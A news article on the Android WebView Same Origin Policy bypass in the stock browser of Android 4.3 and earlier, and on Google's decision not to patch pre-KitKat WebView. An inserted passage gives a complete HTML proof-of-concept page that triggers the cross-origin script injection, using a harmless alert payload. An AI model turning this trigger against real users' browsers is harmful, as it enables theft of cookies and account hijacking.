900+ million users left in the lurch as Google says it has stopped providing security patches for the WebView component in Android 4.3 Jelly Bean and earlier versions
Sad but true. If you are one of those people running Android 4.3 or an earlier version on your smartphone and are waiting for Google to patch the Android Same Origin Policy (SOP) bypass vulnerability, you are not going to get a fix from Google.
The Android legacy SOP flaw, discovered by Pakistani security researcher Rafay Baloch, affects the WebView component behind the default Android browser shipped on the roughly 930 million smartphones running Android 4.3 Jelly Bean and below.
The vulnerability in the WebView component is triggered by replacing the "data" attribute of an HTML object element with a javascript: URL after a page from another origin has been loaded into it. An attacker can leverage the resulting universal cross-site scripting (UXSS) flaw to scrape cookies and page contents belonging to that other origin from a vulnerable browser window.
The security hole can be exploited in all versions of the Android Open Source Project (AOSP) browser, also known as the Android stock or default browser, on Android 4.3 Jelly Bean and below. Android 4.4 KitKat and later use a different (Chromium-based) WebView and are not affected.
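The following self-check page is an added example; it is not from the article and is not the proof of concept written by Rafay Baloch or the Rapid7 Metasploit module. It exercises exactly the behaviour described above: a cross-origin page is loaded into an HTML object element and its data attribute is then replaced with a javascript: URL. The host you serve it from and the target https://example.org/ are placeholders (assumptions), and the payload only reports document.domain; it reads no cookies or page contents.

```html
<!DOCTYPE html>
<!-- Added check page (not the article's or the researchers' code).
     Assumes: served from a host you control; https://example.org/ is a
     stand-in for any cross-origin page you have permission to test against. -->
<html>
<head>
  <meta charset="utf-8">
  <title>WebView SOP check</title>
</head>
<body>
  <p>Status: <span id="status">loading target into the object element...</span></p>

  <!-- Cross-origin document loaded into an HTML object element. -->
  <object id="target" data="https://example.org/" type="text/html"
          width="400" height="200"></object>

  <script>
    // Benign payload: it only asks which origin the script ends up running in.
    // A vulnerable WebView runs it in the origin of the page already loaded in
    // the object (example.org); a fixed browser either ignores it or runs it
    // in this page's own origin.
    var payload = "javascript:alert('script ran with document.domain = ' + document.domain)";

    window.addEventListener("load", function () {
      var obj = document.getElementById("target");

      // The step the article describes: swap the object's data attribute for a
      // javascript: URL once the cross-origin content has loaded.
      obj.data = payload;

      document.getElementById("status").textContent =
        "javascript: URL assigned to object.data; compare the alerted domain with " +
        location.hostname + " (this page) and example.org (the target)";
    });
  </script>
</body>
</html>
```

Open the page in the stock browser of the device under test. If the alert reports example.org, the script executed inside the cross-origin document, which is the SOP bypass the article is about; if it reports this page's own host, or no alert appears, the SOP held. Whether alert() is displayed at all depends on the embedding application (the stock browser shows it; an app wrapping WebView only does so if it handles JavaScript dialogs), so a silent result in a third-party app is inconclusive rather than a pass.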
Rapid7’s Joe Vennix and Rafay collaborated on a Metasploit module for this vulnerability to give Google and the smartphone manufacturers a working demonstration to patch against.
However, no patch was forthcoming. In the meantime, Trend Micro Labs found the Metasploit code being used in the wild to hijack the Facebook accounts of users whose smartphones ran Android 4.3 Jelly Bean and below.
Rapid7 then reached out to Google to get this critical vulnerability patched and received a surprising reply: Google has stopped providing security patches for Android 4.3 Jelly Bean and below. This is the reply a security researcher on Rapid7’s Metasploit team received from Google:
“If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves, but welcome patches with the report for consideration. Other than notifying OEMs, we will not be able to take action on any report that is affecting versions before 4.4 that are not accompanied with a patch.”
The surprised researcher, Tod Beardsley of Rapid7’s Metasploit team, wrote in a blog post:
“So, Google is no longer going to be providing patches for 4.3. This is some eyebrow-raising news,” he wrote, adding, “I’ve never seen a vulnerability response program that was gated on the reporter providing his own patch, yet that seems to be Google’s position. This change in security policy seemed so bizarre, in fact, that I couldn’t believe that it was actually official Google policy.”
To confirm it, Tod followed up with the Google security team himself and received a similar reply:
“If the affected version [of WebView] is before 4.4, we generally do not develop the patches ourselves but do notify partners of the issue[…] If patches are provided with the report or put into AOSP we are happy to provide them to partners as well.”
It appears that Google has dropped support only for the WebView component of older Android versions: when Tod enquired further he was told that “the Android security team did confirm that other pre-KitKat components, such as the multi-media players, will continue to receive back-ported patches.”
The problem is that, as of now, it is precisely the WebView component of these earlier Android versions that is known to be vulnerable and, as Trend Micro Labs showed, being exploited in the wild. This is the component that most urgently needs a patch across all affected versions so that Android smartphone users are not exploited through the SOP vulnerability.
This also means that as many as 930 million smartphones are out there waiting to be exploited by hackers and cybercriminals. According to Google’s latest Android distribution figures, 46 percent of Android devices run Jelly Bean (versions 4.1 to 4.3), followed by KitKat at 39.1 percent. The remaining Android users are on Gingerbread (versions 2.3.3 to 2.3.7, used by 7.8 percent of handsets), Ice Cream Sandwich (versions 4.0.3 to 4.0.4, used by 6.7 percent), and the old Froyo (version 2.2, 0.4 percent). Everything below KitKat falls outside Google’s new policy, so by these figures roughly 61 percent of active Android devices are on versions Google will no longer patch.
Tod Beardsley called this decision by Google “bizarre”.
The smartphone manufacturers who marketed these phones in years past are no longer interested in providing patches or support for these builds. So who will patch this critical vulnerability and safeguard the millions of Android smartphone users still on Android 4.3 and below is anybody’s guess.